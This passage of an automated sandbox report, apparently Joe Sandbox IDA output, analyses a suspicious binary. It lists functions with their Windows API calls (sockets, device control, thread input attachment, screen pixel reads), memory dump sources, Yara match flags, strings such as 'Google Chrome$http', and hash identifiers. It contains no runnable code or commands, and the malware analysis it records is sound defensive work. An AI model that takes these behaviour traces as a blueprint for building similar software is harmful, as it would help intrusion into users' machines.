                                        • Instruction Fuzzy Hash: 8A11B135340918AFDB05AB24CC49FBE77A9BF85320F148118FA2AD72D3CB70AD048B94
                                        APIs
                                          • Part of subcall function 00C4F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C4E252,?,?,?,00C4F045,00000000,000000EF,00000119,?,?), ref: 00C4F64A
                                          • Part of subcall function 00C4F63B: lstrcpyW.KERNEL32(00000000,?), ref: 00C4F670
                                          • Part of subcall function 00C4F63B: lstrcmpiW.KERNEL32(00000000,?,00C4E252,?,?,?,00C4F045,00000000,000000EF,00000119,?,?), ref: 00C4F6A1
                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C4F045,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E26B
                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00C4E291
                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C4F045,00000000,000000EF,00000119,?,?,00000000), ref: 00C4E2C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: lstrcmpilstrcpylstrlen
                                        • String ID: cdecl
                                        • API String ID: 4031866154-3896280584
                                        • Opcode ID: b4ad50dd7df6784deb1f2bf1dee1682f626d44bbd26675e8a30f3fe8910220e8
                                        • Instruction ID: cca30bf267d3891b2dddd6f46293086eab25347431bae8c3fc2c23a053e625d8
                                        • Opcode Fuzzy Hash: b4ad50dd7df6784deb1f2bf1dee1682f626d44bbd26675e8a30f3fe8910220e8
                                        • Instruction Fuzzy Hash: 9411D036200305AFDB25AF64D845EBA77A8FF45310B51402AF806CB2A0EBB19952D7A4
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C541F2
                                        • _memset.LIBCMT ref: 00C54213
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C54265
                                        • CloseHandle.KERNEL32(00000000), ref: 00C5426E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
                                        • Instruction ID: 7e98bc434943c83a9b67e32718d94ab8fcde7ac8ceb3ae5250e81ffc02141185
                                        • Opcode Fuzzy Hash: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
                                        • Instruction Fuzzy Hash: B811C4759012287AD7309BA5AC4DFAFBB7CEF45720F10429AF918A7190D2704EC48BA8
                                        APIs
                                          • Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57CBE,?,?,00000000), ref: 00C04041
                                          • Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57CBE,?,?,00000000,?,?), ref: 00C04065
                                        • #52.WSOCK32(?,?,?), ref: 00C66849
                                        • #111.WSOCK32(00000000), ref: 00C66854
                                        • _memmove.LIBCMT ref: 00C66881
                                        • #11.WSOCK32(?), ref: 00C6688C
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$#111_memmove
                                        • String ID:
                                        • API String ID: 70051993-0
                                        • Opcode ID: 7a49fbdc6032ea3e5b68de7419d210de4abf51382e63175d724979dfaa3aeca8
                                        • Instruction ID: dd3570eda8b08731b26c6f049f0788156e3b083dd393c9eba93e0a8a213a3169
                                        • Opcode Fuzzy Hash: 7a49fbdc6032ea3e5b68de7419d210de4abf51382e63175d724979dfaa3aeca8
                                        • Instruction Fuzzy Hash: 64115176500109AFCB14EBA4DD86DEEB7B8EF08310B144065F605A72A2DF31AE58EB51
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
                                        • GetStockObject.GDI32(00000011), ref: 00BF2163
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: 9da3552a24d64b8bdd9ee2245816c3f683caec45063f5bf16fee416119ef2efe
                                        • Instruction ID: 9c2280129dc5db917f6e8ca128de4d855fdb0edf606f03b23677c99a2caf01e1
                                        • Opcode Fuzzy Hash: 9da3552a24d64b8bdd9ee2245816c3f683caec45063f5bf16fee416119ef2efe
                                        • Instruction Fuzzy Hash: 37118B7250110DBFDB024F90DC84FEA7BA9EF58364F140145FB0462050C7319D64EBA4
                                        APIs
                                          • Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
                                          • Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
                                          • Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
                                          • Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C163
                                        • LineTo.GDI32(00000000,?,?), ref: 00C7C170
                                        • EndPath.GDI32(00000000), ref: 00C7C180
                                        • StrokePath.GDI32(00000000), ref: 00C7C18E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 8892f20a1823fbdecfa5685f98b240008e736c9f700db9842a4dbf059f91bf36
                                        • Instruction ID: 21a7a25ef70cba511515174f41d635c1b94e660fc35cdc74ef2ae15065704a1d
                                        • Opcode Fuzzy Hash: 8892f20a1823fbdecfa5685f98b240008e736c9f700db9842a4dbf059f91bf36
                                        • Instruction Fuzzy Hash: DEF0E232001259BBDB132F54AC0DFCE3F99AF05321F144100FA14250E1C3790659DFA9
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4A852
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A865
                                        • GetCurrentThreadId.KERNEL32 ref: 00C4A86C
                                        • AttachThreadInput.USER32(00000000), ref: 00C4A873
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
                                        • Instruction ID: dbcc64471ad6d21d4388f064be76ac1eb5fa0537e7c049331b4f812996cad468
                                        • Opcode Fuzzy Hash: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
                                        • Instruction Fuzzy Hash: ACE03932541228BAEB601BA29C0CFDB3F1CFF127A1F108020F919850A0D7718A55CBA4
                                        APIs
                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000), ref: 014FAA02
                                        • GetLastError.KERNEL32(?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000,00000000,?,014F6D0B,?), ref: 014FAA0E
                                          • Part of subcall function 014FA9D4: CloseHandle.KERNEL32(FFFFFFFE,014FAA1E,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000,00000000), ref: 014FA9E4
                                        • ___initconout.LIBCMT ref: 014FAA1E
                                          • Part of subcall function 014FA996: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,014FA9C5,014FA4D5,00000000,?,014F6768,00000000,00000000,00000000,00000000), ref: 014FA9A9
                                        • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,014FA4E8,00000000,00000001,?,00000000,?,014F6768,00000000,00000000,00000000,00000000), ref: 014FAA33
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                        • String ID:
                                        • API String ID: 2744216297-0
                                        • Opcode ID: bf26a5915efbe60c19b5cbe0fa15f557bbd26f3f89c5625ec123a8f12694b213
                                        • Instruction ID: 28b63bc61c43794de5b4fe7a5bb4d09ff9925774a866dd17b74d03771083f814
                                        • Opcode Fuzzy Hash: bf26a5915efbe60c19b5cbe0fa15f557bbd26f3f89c5625ec123a8f12694b213
                                        • Instruction Fuzzy Hash: 50F03736500515BFCF331FD5DC04D9A3F66FB092A1B164015FF6D9A224CB328824EB90
                                        APIs
                                        • SleepConditionVariableCS.KERNELBASE(?,014D8A29,00000064), ref: 014D8AAF
                                        • LeaveCriticalSection.KERNEL32(0152B624,?,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8AB9
                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8ACA
                                        • EnterCriticalSection.KERNEL32(0152B624,?,014D8A29,00000064,?,?,?,01402A3C,0152CE40,0142350F,940E2C7A,?,?), ref: 014D8AD1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                        • String ID:
                                        • API String ID: 3269011525-0
                                        • Opcode ID: dd09edbd48b300dd2e311aa729e53b82937562c02a769453622ee814031c95fc
                                        • Instruction ID: f8e499c1a4418a03dd7ee64d7741051599d0340a0e5f81f941af18362bf028e2
                                        • Opcode Fuzzy Hash: dd09edbd48b300dd2e311aa729e53b82937562c02a769453622ee814031c95fc
                                        • Instruction Fuzzy Hash: 96E01233541134BBDE321F91EC08AAD7F69FB0EB51F060015FA155E25486726904ABD5
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00BF260D
                                        • SetTextColor.GDI32(?,000000FF), ref: 00BF2617
                                        • SetBkMode.GDI32(?,00000001), ref: 00BF262C
                                        • GetStockObject.GDI32(00000005), ref: 00BF2634
                                        • GetWindowDC.USER32(?,00000000), ref: 00C2C0F4
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C2C101
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00C2C11A
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00C2C133
                                        • GetPixel.GDI32(00000000,?,?), ref: 00C2C153
                                        • ReleaseDC.USER32(?,00000000), ref: 00C2C15E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: 7ccdf3345e840e0356b512d4e338d6a8dda9249f455ad6e730f925b2231098ad
                                        • Instruction ID: 29c012375ed4deca08326232af70d9d0c34f604eacf30de80e3329da594228a1
                                        • Opcode Fuzzy Hash: 7ccdf3345e840e0356b512d4e338d6a8dda9249f455ad6e730f925b2231098ad
                                        • Instruction Fuzzy Hash: 25E06531500244AADB615F64BC4D7EC3B20EB15331F14836AFA79480E187714598DB15
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C305A9
                                        • GetDC.USER32(00000000), ref: 00C305B3
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C305D3
                                        • ReleaseDC.USER32(?), ref: 00C305F4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: b1ab702428a5d26b699e219d1f5fe170dcede78e31130eb6c02275fbf5f2f0d9
                                        • Instruction ID: 70e872146dd062c6c8d38b8b0a9d32f16259cb96a5ef891e544463b1f76ef390
                                        • Opcode Fuzzy Hash: b1ab702428a5d26b699e219d1f5fe170dcede78e31130eb6c02275fbf5f2f0d9
                                        • Instruction Fuzzy Hash: 4CE01A76800204EFCB819F60D808BAE7BF1EF8C311F208059FD5AE7210DB3885559F54
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00C305BD
                                        • GetDC.USER32(00000000), ref: 00C305C7
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C305D3
                                        • ReleaseDC.USER32(?), ref: 00C305F4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: d0d50257f10bd293e233a648cb9b0e80817bf9ed6d032b21b03840084a65d708
                                        • Instruction ID: 922a89b3a9e0cf0553f0164dda634cc40a10d718cc37e5cf97c38040100d8524
                                        • Opcode Fuzzy Hash: d0d50257f10bd293e233a648cb9b0e80817bf9ed6d032b21b03840084a65d708
                                        • Instruction Fuzzy Hash: A2E01A76800204AFCB819F60D8087AE7BF1AF8C311F208058FE59A7210DB3895558F54
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 16f7c4a667f7fa0de5bcd22846e0fbf40c866b3778cba6f6b03e3ee73a609ad9
                                        • Instruction ID: b8734e57c395ae7164dab56168c0d70e216d519757f5185e6853c42336c46000
                                        • Opcode Fuzzy Hash: 16f7c4a667f7fa0de5bcd22846e0fbf40c866b3778cba6f6b03e3ee73a609ad9
                                        • Instruction Fuzzy Hash: 1B02C371E026198BCF19CF69C4943EDBBB1AFD9310F19816BD555BB3A1D7708A41CB80
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 014C4E7D
                                          • Part of subcall function 014C3A04: __EH_prolog3.LIBCMT ref: 014C3A0B
                                          • Part of subcall function 014C3A04: std::_Lockit::_Lockit.LIBCPMT ref: 014C3A15
                                          • Part of subcall function 014C3A04: std::_Lockit::~_Lockit.LIBCPMT ref: 014C3A86
                                        • _Find_elem.LIBCPMT ref: 014C508A
                                        Strings
                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 014C4EE5
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                        • API String ID: 2544715827-2799312399
                                        • Opcode ID: 915480212d9ceb49a978790f57fbe7be5fe49fff5e383f64efb6b578b60e148d
                                        • Instruction ID: 4c67d82b1b8d7f619aa80f2cf73e0f0e814deddb7b231ee332086d1309b29852
                                        • Opcode Fuzzy Hash: 915480212d9ceb49a978790f57fbe7be5fe49fff5e383f64efb6b578b60e148d
                                        • Instruction Fuzzy Hash: 79C19D38E042898EEF62DFA8C5947EDBFB2AF51A10F58405FD4856F3A2CB316945CB50
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 014CC684
                                          • Part of subcall function 014C90C2: __EH_prolog3.LIBCMT ref: 014C90C9
                                          • Part of subcall function 014C90C2: std::_Lockit::_Lockit.LIBCPMT ref: 014C90D3
                                          • Part of subcall function 014C90C2: std::_Lockit::~_Lockit.LIBCPMT ref: 014C9144
                                        • _Find_elem.LIBCPMT ref: 014CC8CF
                                        Strings
                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 014CC6FB
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                        • API String ID: 2544715827-2799312399
                                        • Opcode ID: 0ce3849a576b8915580baff060837ddb166f891a62ecc58cbcba5740c41bc592
                                        • Instruction ID: 214b9dfd4d65b6626bdf25b05c806bd61d436330d898095ac63e6105a2cdfa3d
                                        • Opcode Fuzzy Hash: 0ce3849a576b8915580baff060837ddb166f891a62ecc58cbcba5740c41bc592
                                        • Instruction Fuzzy Hash: A7C1A438D042598EDF61DBA8C8C47EDBBB2BF15A14F44409FD48D6B3A2DB359885CB60
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 014CCA61
                                          • Part of subcall function 014C02D0: std::_Lockit::_Lockit.LIBCPMT ref: 014C0323
                                          • Part of subcall function 014C02D0: std::_Lockit::_Lockit.LIBCPMT ref: 014C0345
                                          • Part of subcall function 014C02D0: std::_Lockit::~_Lockit.LIBCPMT ref: 014C0365
                                          • Part of subcall function 014C02D0: std::_Lockit::~_Lockit.LIBCPMT ref: 014C0555
                                        • _Find_elem.LIBCPMT ref: 014CCCAC
                                        Strings
                                        • 0123456789ABCDEFabcdef-+Xx, xrefs: 014CCAD8
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                        • String ID: 0123456789ABCDEFabcdef-+Xx
                                        • API String ID: 3042121994-2799312399
                                        • Opcode ID: a261dc7f2d13f94d49ec2715369976c64b14e7697593137a4e285fe77d96b875
                                        • Instruction ID: ad38af28870b32ce331d32cd4e5b1168bb09cfebb67483077823630e1f917ae0
                                        • Opcode Fuzzy Hash: a261dc7f2d13f94d49ec2715369976c64b14e7697593137a4e285fe77d96b875
                                        • Instruction Fuzzy Hash: FCC19138D042598EDF61DBA8C8C47ADBFB2BF15A14F44409FD84D6B3A2DB359886CB50
                                        APIs
                                          • Part of subcall function 00C049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C027AF,?,00000001), ref: 00C049F4
                                        • _free.LIBCMT ref: 00C3FA84
                                        • _free.LIBCMT ref: 00C3FACB
                                          • Part of subcall function 00C029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF
                                        Strings
                                        • Bad directive syntax error, xrefs: 00C3FAB3
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                        • String ID: Bad directive syntax error
                                        • API String ID: 2861923089-2118420937
                                        • Opcode ID: 1013bf2d20732e9a2a2d4d32c14011cfceba0ed4119d5fa6d406a2d346f7761f
                                        • Instruction ID: 1ffcb8ff423c1f2ee8a4fab1abaf02b82ab8086ba5d4d9bfd065ec30f322d322
                                        • Opcode Fuzzy Hash: 1013bf2d20732e9a2a2d4d32c14011cfceba0ed4119d5fa6d406a2d346f7761f
                                        • Instruction Fuzzy Hash: EB917F71D10259AFCF18EFA4D8919EEB7B4FF05304F14486EF815AB291DB309A46EB50
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 01428A6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task
                                        • String ID: Google Chrome$http
                                        • API String ID: 118556049-548362223
                                        • Opcode ID: fe6268964bbe4206132ae1d52ff37321efd739eb39ef97f96c6675a2de3bee55
                                        • Instruction ID: 56041b6847913fd1275faa8d573a202562e2026f24c73368667d1a71ec65a2e0
                                        • Opcode Fuzzy Hash: fe6268964bbe4206132ae1d52ff37321efd739eb39ef97f96c6675a2de3bee55
